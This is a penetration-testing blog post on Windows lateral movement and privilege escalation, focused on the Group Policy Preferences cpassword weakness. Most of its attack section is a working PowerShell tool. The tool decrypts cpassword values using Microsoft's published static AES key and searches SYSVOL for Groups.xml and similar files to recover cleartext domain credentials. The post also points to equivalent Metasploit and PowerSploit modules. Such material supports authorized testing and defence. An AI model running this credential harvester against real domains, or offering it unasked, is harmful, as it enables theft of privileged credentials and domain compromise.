Lateral Movement: An Overview
Regardless of the method utilized for gaining the initial foothold, penetration testers are often looking for ways to move around the client’s network (referred to as lateral movement or lateral spread). Other machines may hold goodies that further the engagement, whether it is documents that contain the company’s “crown jewels” or stored credentials that give access to databases, Domain Controllers, or other important assets.
While there is an art to gaining situational awareness and understanding the “lay of the land” once the initial foothold is established, this article will instead focus on a subset of tools and techniques for moving around the victim’s Windows environment.
Common Windows Privilege Escalation Vectors
Imagine this scenario: You’ve gotten a Meterpreter session on a machine (HIGH FIVE!), and you opt for running getsystem in an attempt to escalate your privileges… but what if that proves unsuccessful? Should you throw in the towel? Only if you’re a quitter… but you’re not, are you? You’re a champion!!! 🙂
In this post I will walk us through common privilege escalation techniques on Windows, demonstrating how to accomplish each task “manually” as well as discussing any related Metasploit modules. While most techniques are easier to exploit when escalating from Local Administrator to SYSTEM, improperly configured machines can certainly allow escalation from unprivileged accounts in the right circumstances.
Privilege Escalation Via Group Policy Preferences (GPP)
While this is not a new topic in the penetration testing world by any means [Chris Gates (@carnal0wnage) and others were speaking about this way back in 2012], it is still prevalent across many networks today. It’s important enough to talk about because it is “low-hanging fruit” for pentesters (and hackers) and often one of the first things checked for after an initial foothold into a network, as it can quickly allow for escalation to Local Administrator and lateral movement. At that point, it is often just a matter of time before complete Domain compromise.
In this post we will explore the Windows Active Directory feature, Group Policy Preferences (GPP), that was introduced with Server 2008 and how we can exploit this feature to obtain cleartext credentials for privileged accounts in the Domain. The short version: when an administrator uses GPP to set a local account password (or the credentials for a service, scheduled task, mapped drive, data source, or printer), the password is written to an XML file in SYSVOL as a cpassword attribute, AES-256 encrypted with a single static key that Microsoft itself published in the MS-GPPREF documentation. Because every domain user can read SYSVOL and the key is public, “encrypted” here means cleartext to anyone who bothers to decrypt it.
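The following PowerShell is an added example for this post, not code from the original author or from any of the tools mentioned here. It shows the whole chain: where the files live in SYSVOL, what a Groups.xml entry looks like, and how the cpassword value is decrypted. The 32-byte AES key is the static key Microsoft published in the MS-GPPREF specification; the Groups.xml document, the account name and the password in it are constructed for the demo (the ConvertTo-GppCpassword helper exists only to build that sample the way GPP would), and the SYSVOL path assumes a domain-joined host.

```powershell
# Added example (not the original post's code): decrypt Group Policy Preferences
# "cpassword" values. The key below is the static AES-256 key Microsoft published
# in MS-GPPREF; the Groups.xml sample further down is constructed for this demo.

$GppAesKey = [byte[]]@(
    0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
    0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b
)

function New-GppAes {
    # AES-256-CBC, PKCS7 padding, all-zero IV: the parameters GPP uses.
    $aes         = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key     = $GppAesKey
    $aes.IV      = New-Object byte[] 16
    return $aes
}

function ConvertFrom-GppCpassword {
    param([Parameter(Mandatory)][string]$Cpassword)
    # GPP strips the trailing '=' base64 padding when it writes the XML; restore it.
    $padded     = $Cpassword + ('=' * ((4 - ($Cpassword.Length % 4)) % 4))
    $ciphertext = [Convert]::FromBase64String($padded)
    $aes        = New-GppAes
    $plaintext  = $aes.CreateDecryptor().TransformFinalBlock($ciphertext, 0, $ciphertext.Length)
    # The password is stored as UTF-16LE.
    return [System.Text.Encoding]::Unicode.GetString($plaintext)
}

function ConvertTo-GppCpassword {
    # Only used to build the constructed sample below; on a real domain GPP does this
    # when an administrator sets a password in the preference item.
    param([Parameter(Mandatory)][string]$Password)
    $plaintext  = [System.Text.Encoding]::Unicode.GetBytes($Password)
    $aes        = New-GppAes
    $ciphertext = $aes.CreateEncryptor().TransformFinalBlock($plaintext, 0, $plaintext.Length)
    return [Convert]::ToBase64String($ciphertext).TrimEnd('=')
}

function Get-GppCredentialFromXml {
    # Pulls every element carrying a cpassword attribute, whatever the preference type
    # (Groups.xml uses userName, Services.xml accountName, ScheduledTasks.xml runAs).
    param([Parameter(Mandatory)][xml]$Xml, [string]$Source = '<inline>')
    foreach ($node in $Xml.SelectNodes('//*[@cpassword]')) {
        [pscustomobject]@{
            File     = $Source
            UserName = ($node.userName, $node.accountName, $node.runAs | Where-Object { $_ } | Select-Object -First 1)
            NewName  = $node.newName
            Password = ConvertFrom-GppCpassword $node.cpassword
            Changed  = $node.ParentNode.changed
        }
    }
}

function Find-GppCredential {
    # Walks SYSVOL on a real domain (readable by any domain user); not invoked in the demo.
    param([string]$Domain = $env:USERDNSDOMAIN)
    $files = 'Groups.xml','Services.xml','ScheduledTasks.xml','DataSources.xml','Drives.xml','Printers.xml'
    Get-ChildItem -Path "\\$Domain\SYSVOL" -Recurse -Include $files -ErrorAction SilentlyContinue |
        Where-Object { Select-String -Path $_.FullName -Pattern 'cpassword="[^"]' -Quiet } |
        ForEach-Object { Get-GppCredentialFromXml -Xml ([xml](Get-Content $_.FullName -Raw)) -Source $_.FullName }
}

# --- Constructed sample Groups.xml; the account and password are made up for this demo ---
$sampleCpassword = ConvertTo-GppCpassword 'Summer2014!'
[xml]$sampleXml = @"
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="LocalAdmin" changed="2014-05-02 10:15:00">
    <Properties action="U" newName="" fullName="" description="Workstation admin"
                cpassword="$sampleCpassword" changeLogon="0" noChange="1" neverExpires="1"
                acctDisabled="0" userName="LocalAdmin"/>
  </User>
</Groups>
"@

Get-GppCredentialFromXml -Xml $sampleXml | Format-List
```

Running the script as-is round-trips the constructed sample: the Password field comes back as the password that was encrypted into the XML, with no key material other than the published constant. On an engagement, call Find-GppCredential from any domain-joined host as any domain user; the same job is done by PowerSploit’s Get-GPPPassword and Metasploit’s post/windows/gather/credentials/gpp (from a session) and auxiliary/scanner/smb/smb_enum_gpp (over SMB). One caveat worth remembering: MS14-025 only removed the ability to set new passwords through the GPP UI; it does not touch XML files already sitting in SYSVOL, which is why this still turns up credentials on domains patched years ago.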